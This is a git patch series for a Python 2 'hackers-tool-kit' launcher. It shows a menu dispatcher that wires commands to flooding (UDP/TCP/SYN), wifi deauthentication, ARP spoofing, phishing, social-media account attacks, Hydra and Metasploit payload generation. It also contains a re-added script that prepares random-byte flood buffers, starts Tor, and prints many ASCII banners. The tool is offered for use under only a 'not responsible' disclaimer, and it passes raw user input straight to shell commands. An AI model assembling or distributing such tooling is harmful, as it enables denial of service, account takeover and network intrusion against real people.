foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - -#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - -#COMPILE C START# -#---------------# -def compilec(): - print "filename / filepath" - r = raw_input("> ") - print "\nfilename2 / filepath2" - h = raw_input("> ") - - a = 'g++ {0} -o {1}'.format(r,h) - os.system(a) -#COMPILE C END# -#-------------# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - if x == "compilec": - compilec() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 70a7f33d4d37bb6bb1cfa1921d70121c1e442470 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 30 Jun 2019 06:01:26 +0100 Subject: [PATCH 180/214] Add files via upload --- htk.py | 3232 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3232 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..32bf6b6 --- /dev/null +++ b/htk.py @@ -0,0 +1,3232 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ 